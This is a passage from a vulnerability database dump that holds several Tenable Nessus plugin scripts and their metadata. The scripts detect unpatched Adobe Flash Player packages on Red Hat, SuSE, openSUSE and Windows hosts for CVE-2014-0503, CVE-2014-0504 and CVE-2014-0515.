policy. (CVE-2014-0503)\n\nA vulnerability was reported that could be used to read the contents\nof the clipboard. (CVE-2014-0504)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.346.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-08.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0289\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0504\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0503\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0289\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.346-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.346-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:39", "description": "Adobe Flash Player was updated to version 11.2.202.346 to fix security issues :\n\n - A vulnerability that could be used to bypass the same origin policy was fixed. (CVE-2014-0503)\n\n - A vulnerability that could be used to read the contents of the clipboard was fixed. More information can be found on:\n http://helpx.adobe.com/security/products/flash-player/ap sb14-08.html. (CVE-2014-0504)", "cvss3": {}, "published": "2014-03-18T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 9012)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player", "p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_FLASH-PLAYER-140313.NASL", "href": "https://www.tenable.com/plugins/nessus/73075", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73075);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 9012)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 11.2.202.346 to fix security\nissues :\n\n - A vulnerability that could be used to bypass the same\n origin policy was fixed. (CVE-2014-0503)\n\n - A vulnerability that could be used to read the contents\n of the clipboard was fixed. More information can be\n found on:\n http://helpx.adobe.com/security/products/flash-player/ap\n sb14-08.html. (CVE-2014-0504)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=867808\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0503.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0504.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9012.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.346-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.346-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.346-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.346-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.346-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.346-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:22:51", "description": "According to its version, the instance of Flash Player installed on the remote Windows host is equal or prior to 11.7.700.269 / 11.8.x / 11.9.x / 12.0.0.70. It is, therefore, potentially affected multiple vulnerabilities :\n\n - A vulnerability exists that could be used to bypass the same origin policy. (CVE-2014-0503)\n\n - A vulnerability exists that could be used to read the contents of the clipboard. (CVE-2014-0504)", "cvss3": {}, "published": "2014-03-11T00:00:00", "type": "nessus", "title": "Flash Player <= 11.7.700.269 / 12.0.0.70 Multiple Vulnerabilities (APSB14-08)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB14-08.NASL", "href": "https://www.tenable.com/plugins/nessus/72937", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72937);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(66122, 66127);\n\n script_name(english:\"Flash Player <= 11.7.700.269 / 12.0.0.70 Multiple Vulnerabilities (APSB14-08)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Windows host is equal or prior to 11.7.700.269 / 11.8.x /\n11.9.x / 12.0.0.70. It is, therefore, potentially affected multiple\nvulnerabilities :\n\n - A vulnerability exists that could be used to bypass the\n same origin policy. (CVE-2014-0503)\n\n - A vulnerability exists that could be used to read the\n contents of the clipboard. (CVE-2014-0504)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-08.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.272 / 12.0.0.77 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0503\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\", \"Chrome_Pepper\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n (\n # Chrome Flash <= 12.0.0.70\n variant == \"Chrome_Pepper\" &&\n (iver[0] == 12 && iver[1] == 0 && iver[2] == 0 && iver[3] <= 70)\n ) ||\n (variant != \"Chrome_Pepper\" &&\n (\n # < 11\n iver[0] < 11 ||\n # 11.x <= 11.7.700.269\n (\n iver[0] == 11 &&\n (\n iver[1] < 7 ||\n (\n iver[1] == 7 &&\n (\n iver[2] < 700 ||\n (iver[2] == 700 && iver[3] <= 269)\n )\n )\n )\n ) ||\n # 11.8.x\n (iver[0] == 11 && iver[1] == 8) ||\n # 11.9.x\n (iver[0] == 11 && iver[1] == 9) ||\n\n # 12.0.0.x <= 12.0.0.70\n (\n iver[0] == 12 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 70\n )\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product: Browser Plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 12.0.0.77 (Chrome PepperFlash)';\n else\n {\n if (ver =~ \"^11\\.7\")\n fix = \"11.7.700.272\";\n else\n fix = \"12.0.0.77\";\n info += '\\n Fixed version : '+fix;\n }\n info += '\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_warning(port:port, extra:info);\n else security_warning(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:03", "description": "Adobe Flash Player was updated to version 11.2.202.346 to fix security issues :\n\nCVE-2014-0503: A vulnerability that could be used to bypass the same origin policy was fixed.\n\nCVE-2014-0504: A vulnerability that could be used to read the contents of the clipboard was fixed.\n\nMore information can be found on:\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-08.html", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2014:0377-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0504", "CVE-2014-0503", "CVE-2014-0504"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-212.NASL", "href": "https://www.tenable.com/plugins/nessus/75293", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-212.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75293);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-0504\", \"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(58184, 66122, 66127);\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2014:0377-1)\");\n script_summary(english:\"Check for the openSUSE-2014-212 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 11.2.202.346 to fix security\nissues :\n\nCVE-2014-0503: A vulnerability that could be used to bypass the same\norigin policy was fixed.\n\nCVE-2014-0504: A vulnerability that could be used to read the contents\nof the clipboard was fixed.\n\nMore information can be found on:\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-08.html\"\n );\n # http://helpx.adobe.com/security/products/flash-player/apsb14-08.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-08.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=867808\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-03/msg00042.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-11.2.202.346-2.64.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-gnome-11.2.202.346-2.64.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-kde4-11.2.202.346-2.64.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.346-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.346-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.346-38.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:16:32", "description": "An updated Adobe Flash Player package that fixes one security issue is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This vulnerability is detailed in the Adobe Security Bulletin APSB14-13, listed in the References section.\n\nA flaw was found in the way flash-plugin displayed certain SWF content. An attacker could use this flaw to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0515)\n\nAll users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 11.2.202.356.", "cvss3": {}, "published": "2014-04-30T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2014:0447)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.5"], "id": "REDHAT-RHSA-2014-0447.NASL", "href": "https://www.tenable.com/plugins/nessus/73780", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0447. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73780);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0515\");\n script_xref(name:\"RHSA\", value:\"2014:0447\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2014:0447)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes one security issue is\nnow available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\nCritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed in the Adobe Security Bulletin APSB14-13,\nlisted in the References section.\n\nA flaw was found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use this flaw to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially,\nexecute arbitrary code when the victim loaded a page containing the\nmalicious SWF content. (CVE-2014-0515)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.356.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-13.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0515\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) 